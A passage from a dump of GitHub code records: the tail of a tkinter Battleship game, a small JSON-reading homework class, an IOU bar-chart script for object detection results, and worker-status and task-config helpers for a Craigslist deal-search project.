bg=\"white\", fg=\"blue\")\n # print(self.board)\n\n # The computer's moves are random right now. 
Some intelligence in the future would be nice.\n def autoMove(self):\n x = self.valid[random.randint(0, len(self.valid) - 1)]\n #moves_b.append(x)\n return x\n\n def strategic_move(self):\n # if hits[-1][0] == 0 and hits[-1][1] != 0:\n # opt = [\"x\", \"y\", \"-y\"]\n # elif hits[-1][1] == 0 and hits[-1][0] != 0:\n # opt = [\"-x\", \"x\", \"y\"]\n # elif hits[-1][1] == 0 and hits[-1][0] == 0:\n # opt = [\"x\", \"y\"]\n # elif hits[-1][1] == (BOARD_SIZE - 1) and hits[-1][0] == (BOARD_SIZE - 1):\n # opt = [\"-x\", \"-y\"]\n # elif hits[-1][1] == (BOARD_SIZE - 1):\n # opt = [\"-x\", \"-y\", \"x\"]\n # elif hits[-1][0] == (BOARD_SIZE - 1):\n # opt = [\"x\", \"-y\",\"y\"]\n # else:\n # opt = [\"-x\",\"x\",\"y\",\"-y\"]\n # xory = random.choice(opt)\n # if xory == \"-x\":\n # print(xory,moves_b)\n # x = hits[-1][0] -1\n # y = hits[-1][1]\n # if [x, y] not in self.valid:\n # xory = random.choice([\"x\",\"y\",\"-y\"])\n # if xory == \"x\":\n # print(xory,moves_b)\n # x = hits[-1][0] + 1\n # y = hits[-1][1]\n # if [x, y] not in self.valid:\n # xory = random.choice([\"y\",\"-y\"])\n # if xory == \"-y\":\n # print(xory,moves_b)\n # x = hits[-1][0]\n # y = hits[-1][1] - 1\n # if [x, y] not in self.valid:\n # xory = random.choice([\"x\",\"y\",\"-y\"])\n # if xory == \"y\":\n # print(xory,moves_b)\n # x = hits[-1][0]\n # y = hits[-1][1] + 1\n # if [x, y] not in self.valid:\n # y -= 2\n # if [x, y] not in self.valid:\n # y += 1\n # x += 1\n # if [x, y] not in self.valid:\n # x -= 2\n # if [x,y] not in self.valid:\n # x = moves_b[-1][0] + 1\n\n x = hits[-1][0] - 1\n y = hits[-1][1]\n opt = [\"x\",\"-x\",\"y\",\"-y\"]\n valid = [x,y] in self.valid\n tried = []\n d = 1\n a = -1\n while not valid:\n xory = random.choice(opt)\n if xory in tried:\n if len(tried) == len(opt):\n tried = []\n d += 1\n continue\n if xory == \"-x\":\n tried.append(xory)\n # print(xory, moves_b)\n x = hits[-1][0] - d\n y = hits[-1][1]\n valid = [x, y] in self.valid\n continue\n if xory == \"x\":\n tried.append(xory)\n # print(xory, moves_b)\n x = hits[-1][0] + d\n y = hits[-1][1]\n valid = [x, y] in self.valid\n continue\n if xory == \"-y\":\n tried.append(xory)\n # print(xory, moves_b)\n x = hits[-1][0]\n y = hits[-1][1] - d\n valid = [x, y] in self.valid\n continue\n if xory == \"y\":\n tried.append(xory)\n # print(xory, moves_b)\n x = hits[-1][0]\n y = hits[-1][1] + d\n valid = [x, y] in self.valid\n continue\n #moves_b.append([x, y])\n return x, y\n\n\n # Returns True if we've placed the last ship, otherwise False\n def donePlacingShips(self, holdi):\n for x1, y1 in self.ships[holdi].position.keys():\n self.buttons[x1][y1].configure(image=self.parent.ship1, compound=\"left\")\n if holdi == len(self.ships) - 1:\n return True\n return False\n\n # Returns False if the x,y position is already taken by another ship\n # Otherwise, the position is open, so True is returned\n def positionEmpty(self, x, y):\n for ship in self.ships:\n if (x, y) in ship.position:\n return False\n return True\n\n # Allows the player to place ships on their board wherever they choose\n # Uses the board GUI in order to place the ships\n # Will only allow legal placement of the ships\n def placeShips(self, x, y):\n found = False\n holdi = -1\n for i, ship in enumerate(self.ships):\n self.status.configure(text=f\"{ship.name} {ship.size} tiles\", bg=\"white\", fg=\"blue\")\n if len(ship.position) < ship.size:\n if len(ship.position) == 0:\n found = True\n elif len(ship.position) == 1:\n x1, y1 = list(ship.position.keys())[0]\n if (x == x1 and (y == y1 + 1 or y 
== y1 - 1)) or \\\n (y == y1 and (x == x1 + 1 or x == x1 - 1)):\n found = True\n else:\n a = sorted(ship.position.keys())\n xdif = a[1][0] - a[0][0]\n ydif = a[1][1] - a[0][1]\n if (x + xdif == a[0][0] and y + ydif == a[0][1]) or \\\n (x - xdif == a[-1][0] and y - ydif == a[-1][1]):\n found = True\n holdi = i\n break\n if found and self.positionEmpty(x, y):\n self.ships[holdi].position[(x, y)] = 1\n self.buttons[x][y].configure(image=self.parent.ship, compound=\"left\")\n else:\n for x1, y1 in self.ships[holdi].position.keys():\n self.buttons[x1][y1].configure(image=self.parent.blank, compound=\"left\")\n self.ships[holdi].position = {}\n return False\n if self.ships[holdi].size == len(self.ships[holdi].position):\n human_ship_pos.append(list(ship.position.keys()))\n return self.donePlacingShips(holdi)\n return False\n\n\nclass Game:\n def reset(self):\n self.player.reset()\n self.computer.reset()\n self.status = 'Setup'\n\n def __init__(self):\n self.player = Player(self, \"Player\")\n self.computer = Player(self, \"Computer\", True)\n self.hit = PhotoImage(file=\"hit.gif\").subsample(4, 4)\n self.miss = PhotoImage(file=\"miss.gif\").subsample(4, 4)\n self.blank = PhotoImage(file=\"blank.gif\").subsample(4, 4)\n self.ship = PhotoImage(file=\"ship.gif\").subsample(4, 4)\n self.ship1 = PhotoImage(file=\"ship1.gif\").subsample(4, 4)\n self.reset()\n\n # A move was made from our GUI\n def tkmove(self, x, y, root):\n global strategy\n # print(self.turn, self.player.text, x, y)\n if self.player.checkMove(x, y):\n self.player.move(x, y, 'X',\"human\")\n if self.status == 'GamePlay':\n if self.computer.auto:\n if strategy:\n x, y = self.computer.strategic_move()\n else:\n x, y = self.computer.autoMove()\n # if self.player.sunk < 5:\n self.computer.move(x, y, 'X', \"bot\")\n\n # Called when clicking on the player's board. 
This is used to place the player's ships on their board.\n def tkplaceships(self, x, y, root):\n if self.status == 'Setup':\n if self.computer.placeShips(x, y):\n completeBoard(self, root)\n self.status = 'GamePlay'\n # print(self.computer.ships[0].position)\n\n\ndef startBoard(game, root):\n global frames\n frames += [Frame(root, bg=\"blue\", height=70, width=232)]\n frames[-1].pack_propagate(False)\n game.player.label = Label(frames[-1], text=f\"{game.player.name}'s Board\", fg=\"white\", bg=\"blue\",\n font=\"Verdana 12 bold\", anchor=\"center\", justify=\"center\")\n game.player.label.pack()\n game.computer.status = Label(frames[-1], text=\"Setup\", fg=\"blue\", bg=\"white\", font=\"Verdana 16 bold\",\n anchor=\"center\", justify=\"center\")\n game.computer.status.pack()\n frames[-1].grid(column=0, row=0, sticky=\"n\")\n frames += [Frame(root, bg=\"blue\")]\n frames[-1].pack_propagate(False)\n frames[-1].grid(sticky=\"n\")\n # game.computer.boardInit()\n\n frames += [Frame(root, bg=\"blue\", height=70, width=232)]\n frames[-1].pack_propagate(False)\n game.computer.status2 = Label(frames[-1], text=\"Ships intact: 5\", fg=\"blue\", bg=\"white\", font=\"Verdana 16\",\n anchor=\"center\", justify=\"center\")\n game.computer.status2.pack()\n frames[-1].grid(column=0, row=1, sticky=\"n\")\n frames += [Frame(root, bg=\"blue\")]\n frames[-1].pack_propagate(False)\n frames[-1].grid(sticky=\"n\")\n game.computer.boardInit()\n return\n\n\ndef completeBoard(game, root):\n global frames\n frames += [Frame(root, bg=\"blue\", width=10)]\n frames[-1].grid(column=1, row=0, sticky=\"n\")\n frames[-1] = Frame(root, bg=\"blue\", height=70, width=232)\n frames[-1].pack_propagate(False)\n game.computer.label = Label(frames[-1], text=f\"{game.computer.name}'s Board\", fg=\"white\", bg=\"blue\",\n font=\"Verdana 12 bold\", anchor=\"center\", justify=\"center\")\n game.computer.label.pack()\n game.player.status = Label(frames[-1], text=f\"You go first.\", fg=\"blue\", bg=\"white\", font=\"Verdana 16 bold\",\n anchor=\"center\", justify=\"center\")\n game.player.status.pack()\n frames[-1].grid(column=2, row=0, sticky=\"n\")\n frames += [Frame(root, bg=\"blue\")]\n frames[-1].pack_propagate(False)\n frames[-1].grid(column=2, row=1, sticky=\"n\")\n\n frames += [Frame(root, bg=\"blue\", height=70, width=232)]\n frames[-1].pack_propagate(False)\n game.player.status2 = Label(frames[-1], text=\"Ships intact: 5\", fg=\"blue\", bg=\"white\", font=\"Verdana 16\",\n anchor=\"center\", justify=\"center\")\n game.player.status2.pack()\n frames[-1].grid(column=2, row=1, sticky=\"n\")\n frames += [Frame(root, bg=\"blue\")]\n frames[-1].pack_propagate(False)\n frames[-1].grid(sticky=\"n\")\n\n frames[-1].grid(column=2, row=2, sticky=\"n\")\n game.player.boardInit()\n game.player.initShipPositions()\n return\n\n\nif __name__ == '__main__':\n root = Tk()\n root.title(\"Battleship Game\")\n game = Game()\n startBoard(game, root)\n root.mainloop()\n", "repo_name": "Jinav22/Battleship_RIDS", "sub_path": "battleship.py", "file_name": "battleship.py", "file_ext": "py", "file_size_in_byte": 19321, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 98, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 154, "usage_type": "call"}, {"api_name": 
"functools.partial", "line_number": 157, "usage_type": "call"}, {"api_name": "tkinter.messagebox.askyesno", "line_number": 162, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 162, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 262, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 322, "usage_type": "call"}]} +{"seq_id": "15408482924", "text": "import json\n\n\nclass PersonalData:\n def __init__(self, user_file):\n self.user_file = user_file\n self.user_data = self.read_json_file() # user_data - contains the contents of the data_file\n self.name = self.user_data['name']\n self.city = self.user_data['city']\n self.children = self.user_data['children']\n self.has = self.user_data['has']\n\n def read_json_file(self):\n with open(self.user_file, 'r') as data_file:\n return json.load(data_file)\n\n def user_info(self):\n print(f'The users name is {self.name}. '\n f'He has lived in {self.city}. '\n f'He has {len(self.children)} children. Their names are {\", \".join(self.children)}. '\n f'He owns: ', end=\"\")\n for k, v in self.has.items():\n print(\", \".join([f'{k} - {v}']), end=\", \")\n\n\nuser_1 = PersonalData('user1.json')\nprint(user_1.user_info())\nprint('\\n')\nuser_2 = PersonalData('user2.json')\nprint(user_2.user_info())\nprint('\\n')\nuser_3 = PersonalData('user3.json')\nprint(user_3.user_info())\n\n\n", "repo_name": "eugene-okulik/QAP-09onl", "sub_path": "homework/mary_bilaya/homework_25/task_hm_25.py", "file_name": "task_hm_25.py", "file_ext": "py", "file_size_in_byte": 1074, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "18964200378", "text": "import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set_style(\"darkgrid\")\n\nwith open('output/output.txt', \"r\") as f:\n lines = f.readlines()\n\niou = []\nclasses = []\n\nlines = lines[1:]\n\nfor line in lines:\n if line[0] == '#':\n break\n if line[0] == '\\n':\n continue\n line = line.replace('=', ':').strip().split(':')\n if line[-1][-2:] == 'AP':\n classes.append(line[-1][:-2])\n\n if line[0] == 'IOU ':\n value = line[1]\n if value == ' nan':\n value = 0.0\n else:\n value = float(value)\n iou.append(value)\n\niou = np.array(iou)\nclasses = np.array(classes)\n\narg = np.argsort(iou)\nprint(arg)\niou = iou[arg]\nclasses = classes[arg]\nplt.figure(figsize=(9, 21))\nplt.barh(classes, iou, align='center', color='royalblue')\n\nfor index, value in enumerate(iou):\n plt.text(value, index, '{0:.2f}'.format(value), fontsize=16, color='royalblue')\n\nplt.title('Average IOU: {0:.2f}%'.format(np.mean(iou) * 100), fontsize=18)\nplt.xlabel('IOU', fontsize=18)\nplt.yticks(fontsize=18)\nplt.tight_layout()\nplt.savefig('output/iou.png')\nplt.show()\n", "repo_name": "MahmudulAlam/Object-Detection-Using-GPM", "sub_path": "mAP/iou.py", "file_name": "iou.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "seaborn.set_style", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 39, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "43536769207", "text": "from pydantic import ValidationError\nimport logging\nfrom models import DealifySearch, DealifyWorkerStatus, CraigslistOverdueSearchTaskConfig, SearchConfig, CraigslistConfig, LocationRestrictionConfig, PriceRestrictionConfig, DealifySearchTaskTypes, DealifySources\nfrom config import WORKER_LOG_FORMAT, DEV_MODE, BASE_LOGGER_NAME, WORKER_LOG_LEVEL, WORKER_LOG_FILE, SEARCH_CONFIG_CL_CONFIG_KEY_NAME, SEARCH_CONFIG_PRICE_RESTRICTION_KEY_NAME, SEARCH_CONFIG_LOCATION_RESTRICTION_KEY_NAME\nfrom dealify_utils import log, log_debug, log_error, log_messages\nfrom database_helpers import set_dormant_dealify_search, set_overdue_craigslist_queries, read_new_dealify_search_ids, read_dealify_search_by_search_id, update_dealify_worker_status\nfrom task_map import map_task, map_task_config\nimport json\nfrom craigslist_helpers import work_overdue_craigslist_queries, create_craigslist_queries\n\n\n# Legacy, Gross. Functionality now built into validate_task_config\ndef get_default_search_task_config(task):\n if not task.task_type:\n log_error(\n log_messages().search_worker.error_default_task_config_none_task_type)\n return None\n if task.task_type not in [task_type.value for task_type in DealifySearchTaskTypes]:\n log_data = f\"Task Type: {task.task_type}\"\n log_error(log_messages().search_worker.error_default_task_config_unfamiliar_task_type, data=log_data\n )\n return None\n if task.task_type == DealifySearchTaskTypes.SearchOverdueCraigslistQueries.value:\n return CraigslistOverdueSearchTaskConfig()\n\n\n# Legacy, Gross. Use validate_dealify_task instead w/ task_config_map\ndef validate_search_task_config(task):\n if not task.task_config:\n get_default_search_task_config(task)\n if task.task_type == DealifySearchTaskTypes.SearchOverdueCraigslistQueries.value:\n try:\n task_config = CraigslistOverdueSearchTaskConfig(\n **json.loads(task.task_config))\n return task_config\n except ValidationError as ve:\n log_error(\n log_messages().search_worker.error_validate_task_config_ve, ve.json())\n return None\n\n\n# Legacy, Gross. 
Use run_dealify_task w/ task_map\nasync def execute_dealify_search_task(task, conn):\n if task.task_type not in [task_type.value for task_type in DealifySearchTaskTypes]:\n log_data = f\"Task Type: {task.task_type}\"\n log_error(log_messages(\n ).search_worker.error_execute_search_task_unfamiliar_task_type, log_data)\n return None\n log_data = f\"Task ID: {task.task_id}\"\n log(log_messages().search_worker.log_execute_search_task_started, log_data)\n task_config = validate_search_task_config(task)\n if not task_config:\n log_error(\n log_messages().search_worker.error_validate_task_config_no_task_config)\n return None\n if task.task_type == DealifySearchTaskTypes.SearchOverdueCraigslistQueries.value:\n\n log_data = f\"Task ID: {task.task_id}\"\n log(log_messages().search_worker.log_execute_search_task_started, log_data)\n await work_overdue_craigslist_queries(conn, **task_config.dict(exclude_unset=True))\n elif task.task_type == DealifySearchTaskTypes.SetOverdueCraigslistQueries.value:\n await set_overdue_craigslist_queries(conn)\n log(log_messages().search_worker.log_execute_search_task_finished, log_data)\n return True\n\n\ndef validate_task_config(task):\n\n task_config_base = map_task_config(task.task_type)\n if not task_config_base:\n log_error(\n log_messages().search_worker.error_value_is_none.format(value='Task Config'))\n return None\n if not task.task_config:\n log(\"No Custom Task Config Specified, Using Default\")\n return task_config_base() # If no custom task_config specified with task, use Default\n try:\n task_config = task_config_base(**json.loads(task.task_config))\n log(f\"Task Config Validated Successfully\")\n return task_config\n except ValidationError as ve:\n log_error(\n log_messages().search_worker.error_validate_task_config_ve, data=ve.json())\n return task_config_base()\n\n\nasync def run_dealify_task(task, conn):\n task_func = map_task(task.task_type)\n if not task_func:\n log_error(\n log_messages().search_worker.error_execute_search_task_unfamiliar_task_type)\n return None\n task_config = validate_task_config(task)\n if task_config:\n await task_func(conn, **task_config.dict(exclude_unset=True))\n else:\n await task_func(conn)\n log(log_messages().search_worker.log_execute_search_task_finished)\n return True\n\n\ndef start_logger(log_level=WORKER_LOG_LEVEL, dev=DEV_MODE):\n logging.basicConfig(level=log_level,\n filename=WORKER_LOG_FILE,\n filemode='w')\n root_logger = logging.getLogger()\n fh = logging.FileHandler(WORKER_LOG_FILE)\n root_logger.addHandler(fh)\n if dev:\n ch = logging.StreamHandler()\n ch.setLevel(log_level)\n formatter = logging.Formatter(WORKER_LOG_FORMAT)\n ch.setFormatter(formatter)\n root_logger.addHandler(ch)\n base_logger = logging.getLogger(BASE_LOGGER_NAME)\n return base_logger\n\n\nasync def set_worker_status(worker, new_status, conn):\n log_enum_name = DealifyWorkerStatus.__name__\n if new_status not in [status.value for status in DealifyWorkerStatus]:\n log_error(\n log_messages().search_worker.error_enum_unfamiliar_type.format(enum_name=log_enum_name, new_value=new_status))\n return False\n\n if new_status == DealifyWorkerStatus.Error.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Error.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n\n if worker.worker_status == DealifyWorkerStatus.Killed.value:\n if new_status == DealifyWorkerStatus.Dormont.value:\n await 
update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Dormont.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n\n else:\n log_error(log_messages().search_worker.error_enum_illegal_option.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return False\n\n if new_status == DealifyWorkerStatus.Dormont.value:\n if worker.worker_status == DealifyWorkerStatus.Running.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Dormont.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n\n else:\n log_error(log_messages().search_worker.error_enum_illegal_option.format(enum_name=log_enum_name,\n new_value=new_status, old_value=worker.worker_status))\n elif new_status == DealifyWorkerStatus.Running.value:\n if worker.worker_status == DealifyWorkerStatus.Started.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Running.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n else:\n log_error(log_messages().search_worker.error_enum_illegal_option.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n elif new_status == DealifyWorkerStatus.Started.value:\n if worker.worker_status == DealifyWorkerStatus.Dormont.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Started.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n elif new_status == DealifyWorkerStatus.Killed.value:\n await update_dealify_worker_status(worker.worker_id, DealifyWorkerStatus.Killed.value, conn)\n log(log_messages().search_worker.log_enum_update_finished.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return True\n else:\n log_error(log_messages().search_worker.error_enum_invalid_option.format(\n enum_name=log_enum_name, new_value=new_status, old_value=worker.worker_status))\n return False\n", "repo_name": "Kroonjay/Dealify", "sub_path": "legacy/dealify_helpers.py", "file_name": "dealify_helpers.py", "file_ext": "py", "file_size_in_byte": 8878, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dealify_utils.log_error", "line_number": 15, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 16, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 18, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 20, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 20, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes.SearchOverdueCraigslistQueries", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 23, "usage_type": "name"}, {"api_name": "models.CraigslistOverdueSearchTaskConfig", "line_number": 24, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes.SearchOverdueCraigslistQueries", "line_number": 31, "usage_type": "attribute"}, {"api_name": 
"models.DealifySearchTaskTypes", "line_number": 31, "usage_type": "name"}, {"api_name": "models.CraigslistOverdueSearchTaskConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "pydantic.ValidationError", "line_number": 36, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 37, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 38, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 44, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 46, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 46, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 50, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 50, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 53, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 54, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes.SearchOverdueCraigslistQueries", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 56, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 59, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 59, "usage_type": "call"}, {"api_name": "craigslist_helpers.work_overdue_craigslist_queries", "line_number": 60, "usage_type": "call"}, {"api_name": "models.DealifySearchTaskTypes.SetOverdueCraigslistQueries", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.DealifySearchTaskTypes", "line_number": 61, "usage_type": "name"}, {"api_name": "database_helpers.set_overdue_craigslist_queries", "line_number": 62, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 63, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 63, "usage_type": "call"}, {"api_name": "task_map.map_task_config", "line_number": 69, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 71, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 72, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 75, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 78, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 79, "usage_type": "call"}, {"api_name": "pydantic.ValidationError", "line_number": 81, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 82, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 83, "usage_type": "call"}, {"api_name": "task_map.map_task", "line_number": 88, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 90, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 91, "usage_type": "call"}, {"api_name": "dealify_utils.log", "line_number": 98, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 98, "usage_type": "call"}, {"api_name": "config.WORKER_LOG_LEVEL", "line_number": 102, "usage_type": "name"}, {"api_name": "config.DEV_MODE", "line_number": 102, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 103, "usage_type": "call"}, {"api_name": "config.WORKER_LOG_FILE", "line_number": 104, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 106, "usage_type": "call"}, 
{"api_name": "logging.FileHandler", "line_number": 107, "usage_type": "call"}, {"api_name": "config.WORKER_LOG_FILE", "line_number": 107, "usage_type": "argument"}, {"api_name": "logging.StreamHandler", "line_number": 110, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 112, "usage_type": "call"}, {"api_name": "config.WORKER_LOG_FORMAT", "line_number": 112, "usage_type": "argument"}, {"api_name": "logging.getLogger", "line_number": 115, "usage_type": "call"}, {"api_name": "config.BASE_LOGGER_NAME", "line_number": 115, "usage_type": "argument"}, {"api_name": "models.DealifyWorkerStatus.__name__", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 120, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 121, "usage_type": "name"}, {"api_name": "dealify_utils.log_error", "line_number": 122, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 123, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Error", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 126, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 127, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Error", "line_number": 127, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 127, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 128, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 128, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Killed", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 132, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 133, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 133, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 134, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 134, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 134, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 135, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 135, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 140, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 140, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 144, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 144, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus.Running", "line_number": 145, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 145, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 146, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 146, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 146, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 147, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 147, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 152, "usage_type": "call"}, 
{"api_name": "dealify_utils.log_messages", "line_number": 152, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Running", "line_number": 154, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 154, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus.Started", "line_number": 155, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 155, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 156, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Running", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 156, "usage_type": "name"}, {"api_name": "dealify_utils.log", "line_number": 157, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 157, "usage_type": "call"}, {"api_name": "dealify_utils.log_error", "line_number": 161, "usage_type": "call"}, {"api_name": "dealify_utils.log_messages", "line_number": 161, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Started", "line_number": 163, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 163, "usage_type": "name"}, {"api_name": "models.DealifyWorkerStatus.Dormont", "line_number": 164, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 164, "usage_type": "name"}, {"api_name": "database_helpers.update_dealify_worker_status", "line_number": 165, "usage_type": "call"}, {"api_name": "models.DealifyWorkerStatus.Started", "line_number": 165, "usage_type": "attribute"}, {"api_name": "models.DealifyWorkerStatus", "line_number": 165, "usage_type": "name"}, {"api_name": 